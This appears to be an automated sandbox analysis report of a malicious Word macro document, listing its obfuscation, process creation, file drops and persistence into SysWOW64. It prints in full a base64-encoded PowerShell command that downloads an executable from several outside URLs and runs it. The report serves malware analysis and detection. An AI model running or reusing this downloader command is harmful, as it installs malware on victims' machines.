Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2005\6.2.20\ScrollerCtrl_demo\ScrollerTest\Release\ScrollerTest.pdb source: 879.exe, LaunchWinApp.exe

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: QDC5QK1.doc.2.drStream path 'Macros/VBA/Hxzvhpvip' : High number of string operations
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\879.exeCode function: 12_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,12_2_004C0C10
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0043CB3B push ecx; ret 12_2_0043CB4E
Source: C:\Users\user\879.exeCode function: 12_2_0043D669 push ecx; ret 12_2_0043D67C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043CB3B push ecx; ret 13_2_0043CB4E
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043D669 push ecx; ret 13_2_0043D67C
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Users\user\879.exeExecutable created and started: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\879.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\879.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\879.exePE file moved: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\879.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\879.exeFile opened: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,12_2_0040C2F1
Source: C:\Users\user\879.exeCode function: 12_2_0040C2A0 IsIconic,12_2_0040C2A0
Source: C:\Users\user\879.exeCode function: 12_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect,12_2_00412DF2
Source: C:\Users\user\879.exeCode function: 12_2_0042D6B9 IsWindowVisible,IsIconic,12_2_0042D6B9
Source: C:\Users\user\879.exeCode function: 12_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,12_2_00427884
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0040C2F1 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,13_2_0040C2F1
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0040C2A0 IsIconic,13_2_0040C2A0
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00412DF2 IsIconic,GetWindowPlacement,GetWindowRect,13_2_00412DF2
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0042D6B9 IsWindowVisible,IsIconic,13_2_0042D6B9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00427884 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,13_2_00427884
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
